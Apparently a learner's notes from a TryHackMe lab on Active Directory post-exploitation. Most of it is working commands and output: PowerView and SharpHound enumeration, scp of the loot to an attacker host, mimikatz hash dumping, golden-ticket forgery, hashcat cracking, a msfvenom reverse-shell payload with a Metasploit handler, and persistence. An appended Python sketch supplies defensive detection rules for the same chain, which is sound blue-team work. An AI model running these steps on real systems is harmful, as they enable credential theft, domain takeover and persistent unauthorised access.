https://tryhackme.com/room/postexploit
$ ssh [email protected]
> powershell -ep bypass # bypass execution policy so you can run scripts
PS> . .\Downloads\PowerView.ps1
PS> Get-NetUser | select cn
PS> Get-NetGroup -GroupName *admin*
PS> Invoke-ShareFinder
PS> Get-NetComputer -fulldata | select operatingsystem
PS> . .\Downloads\SharpHound.ps1
PS> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
PS> scp -o StrictHostKeyChecking=no 20200802172728_loot.zip [email protected]:~
kali@kali:~$ sudo neo4j console
# Browser: <http://localhost:7474> -> login with neo4j:neo4j(j)
kali@kali:~$ bloodhound
In Bloodhound
> cd Downloads && mimikatz.exe
# ensure running as admin
mimikatz # privilege::debug
Privilege '20' OK
# dump hashes
mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
[...]
kali@kali:~$ hashcat -m1000 <hash> rockyou.txt
> cd Downloads && mimikatz.exe
# ensure running as admin
mimikatz # privilege::debug
# dump hash and identifier (SID/RID) of krbtgt
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : 5508500012cc005cf7082a9a89ebdfdf
# generate golden ticket
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
# open cmd with elevated privileges
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF6CBE143B8
# not possible in this box, but for example:
> dir \\Desktop-1\c$ # view the C:\ drive of Desktop-1
> PsExec.exe \\Desktop-1 cmd.exe # run cmd on Desktop-1
RDP (Remmina)
Simply look around 🙂
# create payload
kali@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.8.83.23 LPORT=5555 -f exe -o shell.exe
# delivering payload
kali@kali:~$ scp shell.exe [email protected]:.
# connecting to payload
kali@kali:~$ msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost 10.8.83.23
msf5 exploit(multi/handler) > run [-z] # to background
[*] Started reverse TCP handler on 10.8.83.23:4444
# run shell.exe on target machine
[*] Command shell session 1 opened (10.8.83.23:4444 -> 10.10.242.217:50062) at 2020-08-02 22:21:15 -0400
background
# creating persistence
msf5 exploit(multi/handler) > use exploit/windows/local/persistence
msf5 exploit(windows/local/persistence) > set session 1
msf5 exploit(windows/local/persistence) > run
# if connection dies, redo msf5 exploit(multi/handler) > run
# some difficulties getting this to work
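Added example (not part of the room or these notes): a small detection sketch from the blue-team side of the chain above, run over constructed process-creation (4688-style) and Kerberos TGS-request (4769-style) events. It flags the execution-policy bypass, PowerView/SharpHound enumeration, mimikatz, and PsExec command lines, and applies the common heuristic that a mimikatz golden ticket carries the domain exactly as typed (here lowercase "controller.local") while a KDC-issued ticket shows the upper-case realm. Event shapes, hostnames and the realm-casing rule are assumptions, not telemetry from the box.

```python
"""Detection sketch for the PowerView/SharpHound -> mimikatz -> golden ticket -> PsExec chain."""
import re
from collections import defaultdict

# Constructed sample events (not real telemetry). 4688 = process creation, 4769 = TGS request.
EVENTS = [
    {"id": 4688, "host": "DESKTOP-1", "cmd": r"powershell -ep bypass"},
    {"id": 4688, "host": "DESKTOP-1",
     "cmd": r"powershell -ep bypass -c Invoke-Bloodhound -CollectionMethod All -ZipFileName loot.zip"},
    {"id": 4688, "host": "DESKTOP-1", "cmd": r"C:\Users\Administrator\Downloads\mimikatz.exe"},
    {"id": 4688, "host": "DESKTOP-1", "cmd": r"PsExec.exe \\Desktop-1 cmd.exe"},
    # Legitimate TGS request: KDC writes the realm in upper case.
    {"id": 4769, "host": "CONTROLLER", "user": "Administrator", "domain": "CONTROLLER.LOCAL"},
    # Forged ticket: domain appears as typed on the mimikatz command line (assumed heuristic).
    {"id": 4769, "host": "CONTROLLER", "user": "Administrator", "domain": "controller.local"},
    {"id": 4688, "host": "WS-2", "cmd": r"notepad.exe"},  # benign control
]

# Command-line patterns taken from the commands used in the walkthrough above.
PROCESS_RULES = [
    ("execution_policy_bypass", re.compile(r"powershell(\.exe)?\b.*\s-(ep|executionpolicy)\s+bypass", re.I)),
    ("ad_enumeration_tooling", re.compile(r"invoke-bloodhound|sharphound|powerview|invoke-sharefinder|get-netuser", re.I)),
    ("credential_dumping_tool", re.compile(r"mimikatz|lsadump|sekurlsa", re.I)),
    ("remote_exec_psexec", re.compile(r"\bpsexec(64)?\.exe\b", re.I)),
]


def classify_process(cmd: str) -> list[str]:
    """Return the names of every process rule the command line matches, in rule order."""
    return [name for name, rx in PROCESS_RULES if rx.search(cmd)]


def tgs_domain_anomaly(event: dict) -> bool:
    """True when the Account Domain field is not fully upper-cased (golden-ticket heuristic)."""
    domain = event.get("domain", "")
    return bool(domain) and domain != domain.upper()


def score_hosts(events: list[dict]) -> dict[str, list[str]]:
    """Aggregate unique finding tags per host so a triage queue can be ordered by breadth."""
    findings = defaultdict(set)
    for e in events:
        if e["id"] == 4688:
            findings[e["host"]].update(classify_process(e["cmd"]))
        elif e["id"] == 4769 and tgs_domain_anomaly(e):
            findings[e["host"]].add("kerberos_realm_case_anomaly")
    return {host: sorted(tags) for host, tags in findings.items() if tags}


if __name__ == "__main__":
    for host, tags in score_hosts(EVENTS).items():
        print(host, tags)
```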